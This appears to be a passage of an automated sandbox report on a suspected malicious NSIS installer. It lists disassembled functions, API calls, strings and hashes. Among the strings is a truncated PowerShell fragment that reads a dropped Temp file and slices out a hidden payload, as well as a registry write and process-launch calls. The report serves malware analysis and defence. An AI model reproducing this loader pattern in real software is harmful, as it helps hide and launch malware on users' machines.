Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3354918095
Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

Function 004062A6 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063E7
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405323,Completed,00000000), ref: 004063FA
SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Completed,?,00405323,Completed,00000000), ref: 00406436
SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 00406444
CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405323,Completed,00000000), ref: 004064CD

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
Completed, xrefs: 004062CB
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7
"$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5, xrefs: 004064A3
: Completed, xrefs: 004062D0, 004063AB, 004063B2, 004063B6, 004063D0, 004063D1, 004063E6, 004063F9, 00406415, 00406440, 00406474, 0040647A, 00406496, 004064A9, 004064C6, 004064CC, 004064D8, 0040650B

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1909516590
Opcode ID: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
Instruction ID: e6e4ebc4b258379f565b747a0f7be2a01952c0151b7e77293941e8e44b6b8026
Opcode Fuzzy Hash: e482eba231f8f4520b3a73f5e1a7f8ad6871b3a875979b684132498817419dc4
Instruction Fuzzy Hash: 12611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Polystichoid,Polystichoid,00000000,00000000,Polystichoid,C:\Users\user\AppData\Local\Temp\depersonaliseredes,?,?,00000031), ref: 004017D5

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 004052EC: lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Completed,Completed), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

Polystichoid, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 0040179E
nerveklinikkernes, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$Polystichoid$nerveklinikkernes
API String ID: 1941528284-1520701577
Opcode ID: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
Opcode Fuzzy Hash: f8428ececabf4161325116f3acae4040179a1912e67cedcda78f44ceba6070dd
Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
lstrlenW.KERNEL32(0040324F,Completed,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
lstrcatW.KERNEL32(Completed,0040324F,0040324F,Completed,00000000,00410EA0,004030B0), ref: 00405347
SetWindowTextW.USER32(Completed,Completed), ref: 00405359
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Strings

Completed, xrefs: 0040530D, 0040531D, 00405323, 00405346, 00405352

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
Opcode Fuzzy Hash: 4b00a31e1e5ea89d2dd6f616c58afdbca4195894880e32749fa2d66186394066
Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
wsprintfW.USER32 ref: 00406640
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Strings

%s%S.dll, xrefs: 0040663A
UXTHEME, xrefs: 004065F7
\, xrefs: 00406616

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403177
GetTickCount.KERNEL32 ref: 004031F8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403225
wsprintfW.USER32 ref: 00403238

Strings

... %d%%, xrefs: 00403232

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DC7
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\TjoY7n65om.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3), ref: 00405DE2

Strings

"C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00405DA9
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DAE, 00405DB2
nsa, xrefs: 00405DB6

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2132468474
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini, xrefs: 00402420, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini
API String ID: 2655323295-1497819284
Opcode ID: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
Opcode Fuzzy Hash: 58e8d34890d429fdc95bed5fa579bd7a10b097d43d2a2625128ce20b791e1a8c
Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,774D3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C12
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057BB: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\depersonaliseredes,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes
API String ID: 1892508949-2693056274
Opcode ID: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
Opcode Fuzzy Hash: ddfeeda49915d85a532ba335a3f5d96bf8af22eec7216368a20200d1754f1dc9
Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E

Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063C6,80000002), ref: 00406198
RegCloseKey.KERNELBASE(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004061A3

Strings

: Completed, xrefs: 00406159

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4

Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
CloseHandle.KERNEL32(?), ref: 004058A3

Strings

Error launching installer, xrefs: 00405880

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

